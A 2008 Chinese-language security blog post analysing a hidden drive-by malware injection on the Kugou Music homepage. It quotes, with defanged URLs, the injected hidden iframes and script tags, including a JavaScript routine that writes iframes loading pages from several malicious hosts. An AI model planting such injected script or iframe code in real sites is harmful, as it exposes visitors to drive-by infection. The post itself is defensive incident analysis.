酷狗音乐首页隐蔽挂马详细分析
[ 作者:yimike | 更新日期:2008-6-23 22:14:10 | 阅读次数: ]
关键字:
1, 酷狗接二连三的挂马
2, 猖狂的cuteqq term
3, uusee漏洞挂马开始单调递增近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。详细过程如下:1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:
引用:
<IFRAME marginWidth=0 marginHeight=0 src="cairing.htm" frameBorder=0 width=230 scrolling=no height=327></IFRAME>
这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm2.每个独立IP首次访问h**p://www.kugou.com/home/cairing.htm这个页面时,源代码里会有一段代码如下:
引用:
<IFRAME id=cif123 src="h**p://count12.5lyes.net/sa.aspx?s1=0&s2=1214155605&s3=82585631941791&s4=1001282043&s5=621d5&n=0.5986579168677271" width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>
相同IP再次访问该页时则不会有该段代码,也就是说酷狗音乐首页的挂马很可能跟此有关。3.某IP首次访问h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001这个个页面时,会读取本地coockies,检查是否登陆过酷狗,然后获取酷狗ID等。
根据这些信息,生成一个iframe,并写入。这个IFRAME,也就是第2步中的51yes的那行代码了。
于是访问该行iframe。
4.就在访问该iframe中src的地址时,收到了一个奇怪的无关链接:
h**p://qq.bcccd.com/11214155595_19024924457258_1001282043_9b9570a2a3268104abea8c96b5799630.html
查看该数据包,详情如下:
注意看黄色高亮部分,也就是说上面这个无关连接引用自51yes.net的链接,也就是第二部中的iframe的地址。
通俗点的理解就是,当访问第2部中的指向51yes.net的iframe时,51yes.net的服务器返回了这个“无关”链接。5.紧追该“无关”链接,得到的代码是:
引用:
<script type="text/javascript">
//window.setTimeout('goo();',1*60*1000);
goo();
function goo()
{
document.write('<iframe width=100 height=100 border=0 src="h**p://ok.dessp.com/mmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://ie.ietop.com/ms.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://arp.aafrp.com/mmmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://mm1.yaoch.com/mmgo.htm"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://ok.dessp.com/m21214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://mm1.yaoch.com/m1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://arp.aafrp.com/s1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
document.write('<script src="h**p://service.o00o.cn:8081/click.aspx?id=test_2"><\/script>');
}</script>
<script src='h**p://s35.cnzz.com/stat.php?id=817650&web_id=817650' language='JavaScript' charset='gb2312'></script>
此时,酷狗音乐首页挂马的原因已经明晰。此次挂马是由两点引起的:
引用:
1.h**p://www.kugou.com/home/cairing.htm被植入恶意代码:<SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>
2.计数站点51yes.net的sa.aspx的代码可能代码被黑客入侵后遭受了恶意修改;或者是机房存在arp病毒导致sa.aspx被感染恶意代码(后者可能性不大)
PS.以上部分链接需要结合本地coockies才能访问
Tags:酷狗音乐
来源:
您的位置: 